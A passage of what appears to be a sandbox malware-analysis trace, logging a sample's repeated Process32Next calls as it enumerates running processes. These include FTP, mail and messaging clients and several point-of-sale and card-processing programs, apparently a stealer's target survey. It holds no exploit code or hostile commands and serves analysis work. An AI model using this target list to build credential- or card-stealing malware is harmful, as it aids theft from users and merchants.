th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0157.244] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0157.247] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0157.249] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0157.251] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0157.253] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0157.256] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x740, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0157.267] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0157.269] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0157.272] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x918, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0157.274] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x920, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0157.277] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x928, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0157.279] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x930, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0157.281] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0157.283] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0157.285] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0157.287] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0157.290] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0157.292] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0157.294] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0157.296] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0157.298] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0157.301] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0157.303] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0157.306] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0157.308] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0157.310] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0157.312] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0157.314] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0157.316] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="through recognize.exe")) returned 1 [0157.318] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0157.320] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0157.322] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0157.324] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xeb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="AppLaunch.exe")) returned 1 [0157.326] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xea0, pcPriClassBase=6, dwFlags=0x0, szExeFile="cdieedr")) returned 1 [0157.328] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xea0, pcPriClassBase=6, dwFlags=0x0, szExeFile="cdieedr")) returned 0 [0157.330] CloseHandle (hObject=0x1518) returned 1 [0157.330] Sleep (dwMilliseconds=0x64) [0157.429] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1518 [0157.438] Process32First (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.439] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0157.441] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0157.443] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0157.445] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0157.447] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0157.449] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0157.450] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0157.452] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0157.453] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0157.455] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.456] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.458] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.460] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.461] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.463] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.464] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0157.466] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0157.468] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.470] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0157.471] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0157.473] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.480] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0157.482] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0157.484] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0157.485] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.487] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0157.488] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0157.490] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x804, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0157.492] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="sufferexistrich.exe")) returned 1 [0157.494] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="have return physical.exe")) returned 1 [0157.496] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or level.exe")) returned 1 [0157.498] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="court camera.exe")) returned 1 [0157.500] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or-finger.exe")) returned 1 [0157.502] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel imagine recently.exe")) returned 1 [0157.503] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="school_for.exe")) returned 1 [0157.505] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x978, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whosefirmthe.exe")) returned 1 [0157.507] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="seat_raise_join.exe")) returned 1 [0157.510] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="formerbuildpresent.exe")) returned 1 [0157.512] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="unittype.exe")) returned 1 [0157.514] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="allow.exe")) returned 1 [0157.517] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="rate.exe")) returned 1 [0157.519] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pushweight.exe")) returned 1 [0157.569] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="film.exe")) returned 1 [0157.579] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="dead.exe")) returned 1 [0157.581] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="than.exe")) returned 1 [0157.583] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0157.585] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0157.587] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0157.590] Process32Next 